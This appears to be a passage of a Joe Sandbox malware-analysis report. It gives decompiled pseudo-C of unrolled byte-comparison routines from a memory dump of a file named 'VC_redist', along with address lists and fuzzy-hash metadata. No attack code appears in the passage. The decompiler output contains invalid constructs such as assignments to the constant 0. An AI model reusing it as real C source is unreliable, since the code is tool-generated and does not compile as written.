                                                                          							L36:
                                                                          							if(_t246 != 0) {
                                                                          								goto L1;
                                                                          							}
                                                                          							_t200 =  *(_t336 - 0x13);
                                                                          							if(_t200 ==  *(_t294 - 0x13)) {
                                                                          								_t246 = 0;
                                                                          								L47:
                                                                          								if(_t246 != 0) {
                                                                          									goto L1;
                                                                          								}
                                                                          								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
                                                                          									_t246 = 0;
                                                                          									L58:
                                                                          									if(_t246 != 0) {
                                                                          										goto L1;
                                                                          									}
                                                                          									_t202 =  *(_t336 - 0xb);
                                                                          									if(_t202 ==  *(_t294 - 0xb)) {
                                                                          										_t246 = 0;
                                                                          										L69:
                                                                          										if(_t246 != 0) {
                                                                          											goto L1;
                                                                          										}
                                                                          										_t203 =  *(_t336 - 7);
                                                                          										if(_t203 ==  *(_t294 - 7)) {
                                                                          											_t246 = 0;
                                                                          											L80:
                                                                          											if(_t246 != 0) {
                                                                          												goto L1;
                                                                          											}
                                                                          											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
                                                                          											if(_t297 == 0) {
                                                                          												L83:
                                                                          												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
                                                                          												if(_t299 == 0) {
                                                                          													L3:
                                                                          													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
                                                                          													if(_t246 != 0) {
                                                                          														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                          													}
                                                                          													goto L1;
                                                                          												}
                                                                          												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
                                                                          												if(_t246 != 0) {
                                                                          													goto L1;
                                                                          												} else {
                                                                          													goto L3;
                                                                          												}
                                                                          											}
                                                                          											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
                                                                          											if(_t246 != 0) {
                                                                          												goto L1;
                                                                          											}
                                                                          											goto L83;
                                                                          										}
                                                                          										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
                                                                          										if(_t301 == 0) {
                                                                          											L73:
                                                                          											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
                                                                          											if(_t303 == 0) {
                                                                          												L75:
                                                                          												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
                                                                          												if(_t305 == 0) {
                                                                          													L77:
                                                                          													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
                                                                          													if(_t246 != 0) {
                                                                          														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                          													}
                                                                          													goto L80;
                                                                          												}
                                                                          												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
                                                                          												if(_t246 != 0) {
                                                                          													goto L1;
                                                                          												}
                                                                          												goto L77;
                                                                          											}
                                                                          											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
                                                                          											if(_t246 != 0) {
                                                                          												goto L1;
                                                                          											}
                                                                          											goto L75;
                                                                          										}
                                                                          										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
                                                                          										if(_t246 != 0) {
                                                                          											goto L1;
                                                                          										}
                                                                          										goto L73;
                                                                          									}
                                                                          									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
                                                                          									if(_t307 == 0) {
                                                                          										L62:
                                                                          										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
                                                                          										if(_t309 == 0) {
                                                                          											L64:
                                                                          											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
                                                                          											if(_t311 == 0) {
                                                                          												L66:
                                                                          												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
                                                                          												if(_t246 != 0) {
                                                                          													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                          												}
                                                                          												goto L69;
                                                                          											}
                                                                          											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
                                                                          											if(_t246 != 0) {
                                                                          												goto L1;
                                                                          											}
                                                                          											goto L66;
                                                                          										}
                                                                          										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
                                                                          										if(_t246 != 0) {
                                                                          											goto L1;
                                                                          										}
                                                                          										goto L64;
                                                                          									}
                                                                          									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
                                                                          									if(_t246 != 0) {
                                                                          										goto L1;
                                                                          									}
                                                                          									goto L62;
                                                                          								}
                                                                          								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
                                                                          								if(_t313 == 0) {
                                                                          									L51:
                                                                          									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
                                                                          									if(_t315 == 0) {
                                                                          										L53:
                                                                          										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
                                                                          										if(_t317 == 0) {
                                                                          											L55:
                                                                          											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
                                                                          											if(_t246 != 0) {
                                                                          												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                          											}
                                                                          											goto L58;
                                                                          										}
                                                                          										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
                                                                          										if(_t246 != 0) {
                                                                          											goto L1;
                                                                          										}
                                                                          										goto L55;
                                                                          									}
                                                                          									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
                                                                          									if(_t246 != 0) {
                                                                          										goto L1;
                                                                          									}
                                                                          									goto L53;
                                                                          								}
                                                                          								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
                                                                          								if(_t246 != 0) {
                                                                          									goto L1;
                                                                          								}
                                                                          								goto L51;
                                                                          							}
                                                                          							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
                                                                          							if(_t319 == 0) {
                                                                          								L40:
                                                                          								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
                                                                          								if(_t321 == 0) {
                                                                          									L42:
                                                                          									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
                                                                          									if(_t323 == 0) {
                                                                          										L44:
                                                                          										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
                                                                          										if(_t246 != 0) {
                                                                          											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                          										}
                                                                          										goto L47;
                                                                          									}
                                                                          									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
                                                                          									if(_t246 != 0) {
                                                                          										goto L1;
                                                                          									}
                                                                          									goto L44;
                                                                          								}
                                                                          								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
                                                                          								if(_t246 != 0) {
                                                                          									goto L1;
                                                                          								}
                                                                          								goto L42;
                                                                          							}
                                                                          							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
                                                                          							if(_t246 != 0) {
                                                                          								goto L1;
                                                                          							}
                                                                          							goto L40;
                                                                          						}
                                                                          						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
                                                                          						if(_t325 == 0) {
                                                                          							L29:
                                                                          							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
                                                                          							if(_t327 == 0) {
                                                                          								L31:
                                                                          								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
                                                                          								if(_t329 == 0) {
                                                                          									L33:
                                                                          									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
                                                                          									if(_t246 != 0) {
                                                                          										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                          									}
                                                                          									goto L36;
                                                                          								}
                                                                          								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
                                                                          								if(_t246 != 0) {
                                                                          									goto L1;
                                                                          								}
                                                                          								goto L33;
                                                                          							}
                                                                          							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
                                                                          							if(_t246 != 0) {
                                                                          								goto L1;
                                                                          							}
                                                                          							goto L31;
                                                                          						}
                                                                          						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
                                                                          						if(_t246 != 0) {
                                                                          							goto L1;
                                                                          						}
                                                                          						goto L29;
                                                                          					}
                                                                          					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
                                                                          					if(_t331 == 0) {
                                                                          						L18:
                                                                          						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
                                                                          						if(_t333 == 0) {
                                                                          							L20:
                                                                          							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
                                                                          							if(_t335 == 0) {
                                                                          								L22:
                                                                          								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
                                                                          								if(_t246 != 0) {
                                                                          									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                                          								}
                                                                          								goto L25;
                                                                          							}
                                                                          							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
                                                                          							if(_t246 != 0) {
                                                                          								goto L1;
                                                                          							}
                                                                          							goto L22;
                                                                          						}
                                                                          						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
                                                                          						if(_t246 != 0) {
                                                                          							goto L1;
                                                                          						}
                                                                          						goto L20;
                                                                          					}
                                                                          					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
                                                                          					if(_t246 != 0) {
                                                                          						goto L1;
                                                                          					}
                                                                          					goto L18;
                                                                          				} else {
                                                                          					__edi =  *(__esi - 0x1f) & 0x000000ff;
                                                                          					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
                                                                          					if(__edi == 0) {
                                                                          						L7:
                                                                          						__edi =  *(__esi - 0x1e) & 0x000000ff;
                                                                          						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                                                          						if(__edi == 0) {
                                                                          							L9:
                                                                          							__edi =  *(__esi - 0x1d) & 0x000000ff;
                                                                          							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                                                          							if(__edi == 0) {
                                                                          								L11:
                                                                          								__ecx =  *(__esi - 0x1c) & 0x000000ff;
                                                                          								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                                          								if(__ecx != 0) {
                                                                          									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                                                          								}
                                                                          								goto L14;
                                                                          							}
                                                                          							0 = 0 | __edi > 0x00000000;
                                                                          							__ecx = (__edi > 0) * 2 != 1;
                                                                          							if((__edi > 0) * 2 != 1) {
                                                                          								goto L1;
                                                                          							}
                                                                          							goto L11;
                                                                          						}
                                                                          						0 = 0 | __edi > 0x00000000;
                                                                          						__ecx = (__edi > 0) * 2 != 1;
                                                                          						if((__edi > 0) * 2 != 1) {
                                                                          							goto L1;
                                                                          						}
                                                                          						goto L9;
                                                                          					}
                                                                          					0 = 0 | __edi > 0x00000000;
                                                                          					__ecx = (__edi > 0) * 2 != 1;
                                                                          					if((__edi > 0) * 2 != 1) {
                                                                          						goto L1;
                                                                          					}
                                                                          					goto L7;
                                                                          				}
                                                                          				L1:
                                                                          				_t197 = _t246;
                                                                          				return _t197;
                                                                          			}
                                                                          0x00000000
                                                                          0x00040e6c
                                                                          0x00040e41
                                                                          0x00040e4a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040e4a
                                                                          0x00040d9f
                                                                          0x00040da1
                                                                          0x00040db9
                                                                          0x00040dc1
                                                                          0x00040dc3
                                                                          0x00040ddb
                                                                          0x00040de3
                                                                          0x00040de5
                                                                          0x00040dfd
                                                                          0x00040e05
                                                                          0x00040e07
                                                                          0x00040e10
                                                                          0x00040e10
                                                                          0x00000000
                                                                          0x00040e07
                                                                          0x00040dee
                                                                          0x00040df7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040df7
                                                                          0x00040dcc
                                                                          0x00040dd5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040dd5
                                                                          0x00040daa
                                                                          0x00040db3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040db3
                                                                          0x00040d08
                                                                          0x00040d0a
                                                                          0x00040d22
                                                                          0x00040d2a
                                                                          0x00040d2c
                                                                          0x00040d44
                                                                          0x00040d4c
                                                                          0x00040d4e
                                                                          0x00040d66
                                                                          0x00040d6e
                                                                          0x00040d70
                                                                          0x00040d79
                                                                          0x00040d79
                                                                          0x00000000
                                                                          0x00040d70
                                                                          0x00040d57
                                                                          0x00040d60
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040d60
                                                                          0x00040d35
                                                                          0x00040d3e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040d3e
                                                                          0x00040d13
                                                                          0x00040d1c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040d1c
                                                                          0x00040c70
                                                                          0x00040c72
                                                                          0x00040c8a
                                                                          0x00040c92
                                                                          0x00040c94
                                                                          0x00040cac
                                                                          0x00040cb4
                                                                          0x00040cb6
                                                                          0x00040cce
                                                                          0x00040cd6
                                                                          0x00040cd8
                                                                          0x00040ce1
                                                                          0x00040ce1
                                                                          0x00000000
                                                                          0x00040cd8
                                                                          0x00040cbf
                                                                          0x00040cc8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040cc8
                                                                          0x00040c9d
                                                                          0x00040ca6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040ca6
                                                                          0x00040c7b
                                                                          0x00040c84
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040c84
                                                                          0x00040bd9
                                                                          0x00040bdb
                                                                          0x00040bf3
                                                                          0x00040bfb
                                                                          0x00040bfd
                                                                          0x00040c15
                                                                          0x00040c1d
                                                                          0x00040c1f
                                                                          0x00040c37
                                                                          0x00040c3f
                                                                          0x00040c41
                                                                          0x00040c4a
                                                                          0x00040c4a
                                                                          0x00000000
                                                                          0x00040c41
                                                                          0x00040c28
                                                                          0x00040c31
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040c31
                                                                          0x00040c06
                                                                          0x00040c0f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040c0f
                                                                          0x00040be4
                                                                          0x00040bed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040bed
                                                                          0x00040b42
                                                                          0x00040b44
                                                                          0x00040b5c
                                                                          0x00040b64
                                                                          0x00040b66
                                                                          0x00040b7e
                                                                          0x00040b86
                                                                          0x00040b88
                                                                          0x00040ba0
                                                                          0x00040ba8
                                                                          0x00040baa
                                                                          0x00040bb3
                                                                          0x00040bb3
                                                                          0x00000000
                                                                          0x00040baa
                                                                          0x00040b91
                                                                          0x00040b9a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040b9a
                                                                          0x00040b6f
                                                                          0x00040b78
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040b78
                                                                          0x00040b4d
                                                                          0x00040b56
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040aa3
                                                                          0x00040aa7
                                                                          0x00040aab
                                                                          0x00040aad
                                                                          0x00040ac5
                                                                          0x00040ac5
                                                                          0x00040acd
                                                                          0x00040acf
                                                                          0x00040ae7
                                                                          0x00040ae7
                                                                          0x00040aef
                                                                          0x00040af1
                                                                          0x00040b09
                                                                          0x00040b09
                                                                          0x00040b11
                                                                          0x00040b13
                                                                          0x00040b1c
                                                                          0x00040b1c
                                                                          0x00000000
                                                                          0x00040b13
                                                                          0x00040af7
                                                                          0x00040afa
                                                                          0x00040b03
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040b03
                                                                          0x00040ad5
                                                                          0x00040ad8
                                                                          0x00040ae1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040ae1
                                                                          0x00040ab3
                                                                          0x00040ab6
                                                                          0x00040abf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00040abf
                                                                          0x00040225
                                                                          0x00040225
                                                                          0x00041016

                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                          • Instruction ID: 7f9865754c9e928978173be0b25f741eae33526bfc4b62e44a27a26df1cfa521
                                                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                          • Instruction Fuzzy Hash: D4C1E4B22051A309DFAD4A7AD43413EBAF16BA27B131A57BDD5B3DB0C4EE30D524C524
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0004022D(void* __edx, void* __esi) {
                                                                          				signed int _t184;
                                                                          				signed char _t185;
                                                                          				signed char _t186;
                                                                          				signed char _t187;
                                                                          				signed char _t188;
                                                                          				signed char _t190;
                                                                          				signed int _t231;
                                                                          				void* _t275;
                                                                          				void* _t278;
                                                                          				void* _t280;
                                                                          				void* _t282;
                                                                          				void* _t284;
                                                                          				void* _t286;
                                                                          				void* _t288;
                                                                          				void* _t290;
                                                                          				void* _t292;
                                                                          				void* _t294;
                                                                          				void* _t296;
                                                                          				void* _t298;
                                                                          				void* _t300;
                                                                          				void* _t302;
                                                                          				void* _t304;
                                                                          				void* _t306;
                                                                          				void* _t308;
                                                                          				void* _t310;
                                                                          				void* _t312;
                                                                          				void* _t313;
                                                                          
                                                                          				_t313 = __esi;
                                                                          				_t275 = __edx;
                                                                          				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
                                                                          					_t231 = 0;
                                                                          					L11:
                                                                          					if(_t231 != 0) {
                                                                          						goto L1;
                                                                          					}
                                                                          					_t185 =  *(_t313 - 0x19);
                                                                          					if(_t185 ==  *(_t275 - 0x19)) {
                                                                          						_t231 = 0;
                                                                          						L22:
                                                                          						if(_t231 != 0) {
                                                                          							goto L1;
                                                                          						}
                                                                          						_t186 =  *(_t313 - 0x15);
                                                                          						if(_t186 ==  *(_t275 - 0x15)) {
                                                                          							_t231 = 0;
                                                                          							L33:
                                                                          							if(_t231 != 0) {
                                                                          								goto L1;
                                                                          							}
                                                                          							_t187 =  *(_t313 - 0x11);
                                                                          							if(_t187 ==  *(_t275 - 0x11)) {
                                                                          								_t231 = 0;
                                                                          								L44:
                                                                          								if(_t231 != 0) {
                                                                          									goto L1;
                                                                          								}
                                                                          								_t188 =  *(_t313 - 0xd);
                                                                          								if(_t188 ==  *(_t275 - 0xd)) {
                                                                          									_t231 = 0;
                                                                          									L55:
                                                                          									if(_t231 != 0) {
                                                                          										goto L1;
                                                                          									}
                                                                          									if( *(_t313 - 9) ==  *(_t275 - 9)) {
                                                                          										_t231 = 0;
                                                                          										L66:
                                                                          										if(_t231 != 0) {
                                                                          											goto L1;
                                                                          										}
                                                                          										_t190 =  *(_t313 - 5);
                                                                          										if(_t190 ==  *(_t275 - 5)) {
                                                                          											_t231 = 0;
                                                                          											L77:
                                                                          											if(_t231 == 0) {
                                                                          												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
                                                                          												if(_t231 != 0) {
                                                                          													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                          												}
                                                                          											}
                                                                          											goto L1;
                                                                          										}
                                                                          										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
                                                                          										if(_t278 == 0) {
                                                                          											L70:
                                                                          											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
                                                                          											if(_t280 == 0) {
                                                                          												L72:
                                                                          												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
                                                                          												if(_t282 == 0) {
                                                                          													L74:
                                                                          													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
                                                                          													if(_t231 != 0) {
                                                                          														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                          													}
                                                                          													goto L77;
                                                                          												}
                                                                          												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
                                                                          												if(_t231 != 0) {
                                                                          													goto L1;
                                                                          												}
                                                                          												goto L74;
                                                                          											}
                                                                          											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
                                                                          											if(_t231 != 0) {
                                                                          												goto L1;
                                                                          											}
                                                                          											goto L72;
                                                                          										}
                                                                          										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
                                                                          										if(_t231 != 0) {
                                                                          											goto L1;
                                                                          										}
                                                                          										goto L70;
                                                                          									}
                                                                          									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
                                                                          									if(_t284 == 0) {
                                                                          										L59:
                                                                          										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
                                                                          										if(_t286 == 0) {
                                                                          											L61:
                                                                          											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
                                                                          											if(_t288 == 0) {
                                                                          												L63:
                                                                          												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
                                                                          												if(_t231 != 0) {
                                                                          													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                          												}
                                                                          												goto L66;
                                                                          											}
                                                                          											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
                                                                          											if(_t231 != 0) {
                                                                          												goto L1;
                                                                          											}
                                                                          											goto L63;
                                                                          										}
                                                                          										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
                                                                          										if(_t231 != 0) {
                                                                          											goto L1;
                                                                          										}
                                                                          										goto L61;
                                                                          									}
                                                                          									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
                                                                          									if(_t231 != 0) {
                                                                          										goto L1;
                                                                          									}
                                                                          									goto L59;
                                                                          								}
                                                                          								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
                                                                          								if(_t290 == 0) {
                                                                          									L48:
                                                                          									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
                                                                          									if(_t292 == 0) {
                                                                          										L50:
                                                                          										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
                                                                          										if(_t294 == 0) {
                                                                          											L52:
                                                                          											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
                                                                          											if(_t231 != 0) {
                                                                          												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                          											}
                                                                          											goto L55;
                                                                          										}
                                                                          										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
                                                                          										if(_t231 != 0) {
                                                                          											goto L1;
                                                                          										}
                                                                          										goto L52;
                                                                          									}
                                                                          									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
                                                                          									if(_t231 != 0) {
                                                                          										goto L1;
                                                                          									}
                                                                          									goto L50;
                                                                          								}
                                                                          								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
                                                                          								if(_t231 != 0) {
                                                                          									goto L1;
                                                                          								}
                                                                          								goto L48;
                                                                          							}
                                                                          							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
                                                                          							if(_t296 == 0) {
                                                                          								L37:
                                                                          								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
                                                                          								if(_t298 == 0) {
                                                                          									L39:
                                                                          									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
                                                                          									if(_t300 == 0) {
                                                                          										L41:
                                                                          										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
                                                                          										if(_t231 != 0) {
                                                                          											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                          										}
                                                                          										goto L44;
                                                                          									}
                                                                          									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
                                                                          									if(_t231 != 0) {
                                                                          										goto L1;
                                                                          									}
                                                                          									goto L41;
                                                                          								}
                                                                          								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
                                                                          								if(_t231 != 0) {
                                                                          									goto L1;
                                                                          								}
                                                                          								goto L39;
                                                                          							}
                                                                          							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
                                                                          							if(_t231 != 0) {
                                                                          								goto L1;
                                                                          							}
                                                                          							goto L37;
                                                                          						}
                                                                          						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
                                                                          						if(_t302 == 0) {
                                                                          							L26:
                                                                          							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
                                                                          							if(_t304 == 0) {
                                                                          								L28:
                                                                          								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
                                                                          								if(_t306 == 0) {
                                                                          									L30:
                                                                          									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
                                                                          									if(_t231 != 0) {
                                                                          										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                          									}
                                                                          									goto L33;
                                                                          								}
                                                                          								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
                                                                          								if(_t231 != 0) {
                                                                          									goto L1;
                                                                          								}
                                                                          								goto L30;
                                                                          							}
                                                                          							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
                                                                          							if(_t231 != 0) {
                                                                          								goto L1;
                                                                          							}
                                                                          							goto L28;
                                                                          						}
                                                                          						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
                                                                          						if(_t231 != 0) {
                                                                          							goto L1;
                                                                          						}
                                                                          						goto L26;
                                                                          					}
                                                                          					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
                                                                          					if(_t308 == 0) {
                                                                          						L15:
                                                                          						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
                                                                          						if(_t310 == 0) {
                                                                          							L17:
                                                                          							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
                                                                          							if(_t312 == 0) {
                                                                          								L19:
                                                                          								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
                                                                          								if(_t231 != 0) {
                                                                          									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                          								}
                                                                          								goto L22;
                                                                          							}
                                                                          							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
                                                                          							if(_t231 != 0) {
                                                                          								goto L1;
                                                                          							}
                                                                          							goto L19;
                                                                          						}
                                                                          						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
                                                                          						if(_t231 != 0) {
                                                                          							goto L1;
                                                                          						}
                                                                          						goto L17;
                                                                          					}
                                                                          					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
                                                                          					if(_t231 != 0) {
                                                                          						goto L1;
                                                                          					}
                                                                          					goto L15;
                                                                          				} else {
                                                                          					__edi = __al & 0x000000ff;
                                                                          					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                                                          					if(__edi == 0) {
                                                                          						L4:
                                                                          						__edi =  *(__esi - 0x1c) & 0x000000ff;
                                                                          						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                                          						if(__edi == 0) {
                                                                          							L6:
                                                                          							__edi =  *(__esi - 0x1b) & 0x000000ff;
                                                                          							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                                                          							if(__edi == 0) {
                                                                          								L8:
                                                                          								__ecx =  *(__esi - 0x1a) & 0x000000ff;
